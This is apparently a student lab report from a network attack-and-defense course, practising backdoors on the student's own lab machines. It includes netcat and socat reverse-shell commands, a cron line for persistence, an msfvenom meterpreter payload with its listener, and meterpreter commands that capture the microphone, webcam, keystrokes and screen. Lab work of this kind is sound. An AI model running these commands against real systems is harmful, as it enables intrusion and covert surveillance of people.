2019-2020-2《网络对抗技术》20175235 Exp2 后门原理与实践
20175235 《网络对抗技术》实验二 后门原理与实践
20175235泽仁拉措
目录:
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.基础知识总结
(1)后门:是不经过正常认证流程而访问系统流程的通道。
(2)常见后门有:编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。
(3)布置后门的流程:一个后门程序;将其放置在系统里;使后门程序代码运行起来;不被查杀软件查杀且不被防火墙发现。(常用技术有:反弹式连接;加密技术;隧道技术)。
(4)常用后门工具:netcat:又名nc、ncat;Linux:自带netcat,输入man nc查看其使用说明;Windows: 下载ncat.rar工具包。
一、Win获得Linux Shell
先下载ncat和socat到主机,将其解压到主机,在主机的cmd输入ip
①首先在Windows中使用 ipconfig 查看主机IP地址
②在cmd进入ncat所在的文件夹,输入命令ncat.exe -l -p 8888并运行
③在linux终端中输入nc 192.168.153.1 8888 -e /bin/sh:
④此时Win已经获得Linux Shell,如图所示:
二、Linux获得Win Shell
①在linux终端中输入ifconfig查看ip
②输入nc -l -p 8888
使其处于监听状态
③.在主机的cmd还是打开之前的ncat文件夹,输入ncat.exe -e cmd.exe192.168.153.128 8888
再看linux已经出现了win的命令提示:
实验内容
一、使用netcat获取主机操作Shell,cron启动
1.crontab -e
指令增加一条定时任务,-e
表示编辑。
2.在最后一行添加1 * * * * /bin/netcat 192.168.153.1 8888 -e /bin/sh
3.当时间到了,此时已经获得了Kali的shell,可以输入指令ls
二、使用socat获取主机操作Shell, 任务计划启动
1.在主机中找到控制面板-系统与安全-管理工具-任务计划程序,选择创建任务
2.选择新建触发器,设置相应触发的时间
3.在操作中选择每次需要执行的程序或脚本
4.看到任务的状态为准备就绪
5.此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口
6.在kali中输入指令socat - tcp:192.168.:8888
此时可以发现已经成功获得了一个shell,下图为输入dir
的结果
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali中生成后门程序meter_backdoor.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 -f exe > meter_backdoor.exe
2.将后门程序拷贝到Win10中,在kali中打开MSF监听程序msfconsole
依次输入use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,set LHOST 192.168.153.128,set LPORT8888
等命令进行配置。
3.在win10中打开meter_backdoor.exe后门程序。
在kali中输入exploit
就能得到入侵成功的结果。
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic
指令可以截获一段音频
2.使用webcam_snap
指令可以使用摄像头进行拍照
3.使用keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录
4.使用screenshot
指令可以进行截屏
五、基础问题回答及实验心得
1.基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:从网上下载的软件包有恶意代码且躲过了查杀,我的系统就有可能被植入了后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:1.开机自启动技术;
2.windows定时任务;
3.木马化正常软件。
(3)Meterpreter有哪些给你映像深刻的功能?
答:Meterpreter是一个后门平台,用`webcam_snap`指令可以使用摄像头进行拍照,让我很惊恐
(4)如何发现自己有系统有没有被安装后门?
答:查看注册表、进程、端口情况,使用杀毒软件进行查杀。
2.实验问题与体会
①.后门程序无法运行 ;解决方法:重新复制一遍后门程序即可
②.linux:查ip 出现:bash:ifconfig;未找到指令
解决方法:输入指令`whereis ifconfig``echo $PATH``export PATH=$PATH:/sbin`再输入`ifconfig`就可以了
这次实验前面刚做我还没什么概念。后面做到使用摄像头进行拍照,我才意识到后门是多么恐怖,一不小心就可能让人探了隐私,真的就是细思极恐。也感想这次实验让我学到了很多,以后下载软件,登录网址一定要尽量小心。